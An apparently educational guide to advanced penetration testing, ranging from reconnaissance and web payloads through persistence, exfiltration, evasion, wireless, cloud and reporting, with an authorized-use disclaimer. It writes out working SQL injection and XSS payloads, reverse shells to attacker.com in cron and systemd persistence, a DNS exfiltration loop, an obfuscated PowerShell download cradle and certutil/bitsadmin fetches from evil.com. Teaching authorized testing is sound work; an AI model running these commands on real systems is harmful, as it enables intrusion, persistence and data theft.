Advanced penetration testing goes beyond basic vulnerability scanning and requires sophisticated techniques, deep understanding of systems, and creative problem-solving skills. This comprehensive guide covers advanced methodologies used by professional penetration testers.

Advanced Reconnaissance Techniques

OSINT and Information Gathering

Passive Intelligence Gathering:

• Social media profiling: LinkedIn, Twitter, Facebook for employee information
• DNS enumeration: Using tools like dnsrecon, fierce, and sublist3r
• Certificate transparency logs: Using crt.sh and Censys
• Search engine dorking: Advanced Google hacking techniques

# Advanced subdomain enumeration
subfinder -d target.com -silent | httpx -silent | nuclei -t vulnerabilities/

# Certificate transparency search
curl -s "https://crt.sh/?q=%.target.com&output=json" | jq -r '.[].name_value' | sort -u

# Shodan API integration
shodan search "org:\"Target Company\""

Active Reconnaissance

Network Mapping and Service Discovery:

# Comprehensive network discovery
nmap -sS -sV -sC -O -A --script=vuln -p- target.com

# UDP scan for often overlooked services
nmap -sU --top-ports 1000 target.com

# IPv6 enumeration
nmap -6 -sS target.com

Advanced Web Application Testing

Manual Testing Techniques

Business Logic Flaws:

• Race condition vulnerabilities
• Payment bypass techniques
• Session management flaws
• Authorization bypass methods

Advanced SQL Injection:

-- Time-based blind SQLi with advanced techniques
1' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a' AND SLEEP(5)--

-- Boolean-based blind SQLi
1' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a'--

-- Error-based SQLi with information extraction
1' AND extractvalue(1, concat(0x7e, (SELECT version()), 0x7e))--

NoSQL Injection Techniques:

// MongoDB injection examples
{"username": {"$ne": ""}, "password": {"$ne": ""}}
{"username": {"$regex": "^admin"}, "password": {"$ne": ""}}

Advanced XSS Techniques

DOM-based XSS:

// Advanced payload encoding
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>

// Filter bypass techniques
<img src=x onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">

// Polyglot payloads
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>

Network Penetration Testing

Advanced Network Attacks

VLAN Hopping:

# VLAN hopping with Yersinia
yersinia -G

# Double tagging attack
vconfig add eth0 100
vconfig add eth0.100 200

IPv6 Attacks:

# IPv6 router advertisement flooding
flood_router6 eth0

# IPv6 neighbor discovery attacks
fake_router6 eth0 2001:db8::1/64

Advanced Pivoting Techniques:

# Metasploit pivoting
meterpreter> run autoroute -s 192.168.1.0/24
meterpreter> background
msf> use auxiliary/server/socks4a

# SSH tunneling for complex scenarios
ssh -D 1080 -N user@pivot-host

Post-Exploitation Techniques

Advanced Persistence Methods

Windows Persistence:

# WMI event subscription
$FilterArgs = @{name='malicious'; EventNameSpace='root\CimV2'; QueryLanguage="WQL"; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfRawData_PerfOS_System'"}
$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs

# Registry persistence
New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "SecurityUpdate" -Value "powershell.exe -WindowStyle Hidden -Command [payload]"

Linux Persistence:

# Cron job persistence
echo "*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'" | crontab -

# Systemd service persistence
cat > /etc/systemd/system/security-update.service << EOF
[Unit]
Description=Security Update Service

[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'
Restart=always

[Install]
WantedBy=multi-user.target
EOF

Data Exfiltration Techniques

Steganography for Data Hiding:

# Hide data in images
steghide embed -cf innocent.jpg -ef secret.txt

# DNS exfiltration
for i in $(xxd -p secret.txt | tr -d '\n' | sed 's/../&./g'); do
    dig ${i}.attacker.com
done

Advanced Tool Usage

Burp Suite Professional Techniques

Custom Extensions and Macros:

• Session handling rules for complex authentication
• Custom Intruder payloads for specific attacks
• Collaborator integration for blind vulnerabilities

Advanced Scanning Configurations:

<!-- Custom scan configuration for APIs -->
<scanning>
    <audit>
        <issues>
            <detail>high</detail>
            <confidence>certain</confidence>
        </issues>
    </audit>
</scanning>

Metasploit Advanced Usage

Custom Module Development:

# Basic exploit module structure
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Custom Exploit Example',
      'Description'    => 'Custom exploit module',
      'Author'         => ['Your Name'],
      'License'        => MSF_LICENSE,
      'References'     => [['URL', 'http://example.com']],
      'Platform'       => 'linux',
      'Targets'        => [['Generic Target', {}]],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2024-01-01'
    ))
  end

  def exploit
    # Exploit code here
  end
end

Nmap Scripting Engine (NSE)

Custom NSE Scripts:

-- Custom vulnerability detection script
description = [[
Custom vulnerability scanner for specific service
]]

author = "Your Name"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "safe"}

portrule = shortport.port_or_service({80, 443}, {"http", "https"})

action = function(host, port)
  local result = {}
  -- Vulnerability detection logic
  return stdnse.format_output(true, result)
end

Mobile Application Testing

Android Application Security

Static Analysis Techniques:

# APK analysis with jadx
jadx-gui app.apk

# Manifest analysis
aapt dump badging app.apk
aapt dump permissions app.apk

# Certificate analysis
keytool -printcert -jarfile app.apk

Dynamic Analysis Setup:

# Frida instrumentation
frida -U -f com.example.app -l hook.js --no-pause

# SSL pinning bypass
frida -U -f com.example.app -l ssl-kill-switch.js

iOS Application Security

Runtime Manipulation:

# Cycript for runtime analysis
cycript -p "Application Name"

# LLDB debugging
lldb --attach-name "Application Name"

Red Team Techniques

Advanced Evasion Methods

Antivirus Evasion:

# PowerShell obfuscation
$a='IEX'
$b='(New-Object'
$c='Net.WebClient)'
$d='.DownloadString'
$e='("http://evil.com/payload.ps1")'
iex "$a$b $c$d$e"

Living off the Land Techniques:

# Using legitimate tools for malicious purposes
certutil -urlcache -split -f http://evil.com/payload.exe payload.exe
bitsadmin /transfer myDownloadJob /download /priority normal http://evil.com/payload.exe C:\temp\payload.exe

Command and Control (C2)

Advanced C2 Techniques:

• Domain fronting for traffic hiding
• DNS over HTTPS (DoH) for covert channels
• Social media platforms as C2 infrastructure

Wireless Security Testing

Wi-Fi Security Assessment

Advanced Wi-Fi Attacks:

# Evil twin with captive portal
hostapd evil_twin.conf &
dnsmasq -C dnsmasq.conf &
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

# WPA2/WPA3 attacks
hashcat -m 22000 capture.hccapx wordlist.txt

Bluetooth Security

Bluetooth Exploitation:

# Bluetooth reconnaissance
hcitool scan
sdptool browse [MAC]

# BlueBorne exploitation
python blueborne.py [TARGET_MAC]

Cloud Security Testing

AWS Security Assessment

AWS Enumeration:

# S3 bucket enumeration
aws s3 ls s3://bucket-name --no-sign-request

# IAM enumeration
aws iam list-users
aws iam list-roles

Container Security:

# Docker escape techniques
docker run --rm -it --pid=host --net=host --privileged ubuntu bash

# Kubernetes pod escape
kubectl exec -it malicious-pod -- /bin/bash

Advanced Reporting and Documentation

Executive Summary Writing

Key Components:

1. Business impact assessment
2. Risk prioritization matrix
3. Remediation timeline
4. Cost-benefit analysis

Technical Report Structure

Detailed Technical Findings:

• Vulnerability classification (CVSS scoring)
• Proof of concept demonstrations
• Remediation recommendations
• Retest procedures

Methodology Frameworks

PTES (Penetration Testing Execution Standard)

Phase Breakdown:

1. Pre-engagement interactions
2. Intelligence gathering
3. Threat modeling
4. Vulnerability analysis
5. Exploitation
6. Post-exploitation
7. Reporting

OWASP Testing Guide v4

Web Application Security Testing:

• Information gathering testing
• Configuration management testing
• Identity management testing
• Authentication testing
• Authorization testing
• Session management testing
• Input validation testing
• Error handling testing
• Cryptography testing
• Business logic testing
• Client-side testing

Legal and Ethical Considerations

Rules of Engagement

Critical Requirements:

• Written authorization from asset owners
• Scope limitations and exclusions
• Emergency contact procedures
• Data handling requirements
• Reporting timelines

Professional Ethics

Responsible Disclosure:

1. Report findings to organization first
2. Allow reasonable time for remediation
3. Avoid public disclosure of critical vulnerabilities
4. Follow coordinated vulnerability disclosure processes

Continuous Learning and Development

Staying Current

Information Sources:

• Security research papers and whitepapers
• CVE databases and vulnerability feeds
• Security conferences and training
• Bug bounty platforms for real-world practice

Skill Development

Recommended Certifications:

• OSCP (Offensive Security Certified Professional)
• GPEN (GIAC Penetration Tester)
• GCIH (GIAC Certified Incident Handler)
• CEH (Certified Ethical Hacker)

Conclusion

Advanced penetration testing requires a combination of technical expertise, creative thinking, and methodical approach. Success comes from understanding both the tools and the underlying systems they target.

Key Takeaways:

1. Methodology over tools: Follow structured approaches
2. Continuous learning: Security landscape constantly evolves
3. Documentation: Thorough reporting is crucial
4. Ethics: Always operate within legal and ethical boundaries

Remember that penetration testing is about helping organizations improve their security posture. The goal is not just to find vulnerabilities but to provide actionable recommendations that enhance overall security.

---

Disclaimer: This content is for educational and authorized testing purposes only. All techniques described should only be used against systems you own or have explicit written permission to test. Unauthorized testing is illegal and unethical.